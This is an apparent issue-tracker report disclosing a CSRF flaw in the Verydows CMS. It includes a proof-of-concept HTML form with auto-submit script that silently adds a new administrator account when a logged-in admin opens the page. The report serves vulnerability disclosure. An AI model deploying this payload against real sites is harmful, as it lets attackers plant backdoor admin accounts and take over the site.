Closed
Description
A CSRF vulnerability was found in this cms.
Logged-in administrator user may add another administrator account by clicking following POC
<form action="http://thewind/verydows/index.php?m=backend&c=admin&a=add&step=submit" id="test" method="post">
<!--Change the url when testing!-->
<input type=text name="username" value="TomAPU" />
<input type=text name="password" value="123456" />
<input type=text name="resetpwd" value="1" />
<input type=text name="repassword" value="123456" />
<input type=text name="name" value="TomAPU" />
<input type=text name="email" value="admin@pornhub.com" />
</form>
<script>
var f=document.getElementById("test");
f.submit();
</script>
Metadata
Metadata
Assignees
Labels
No labels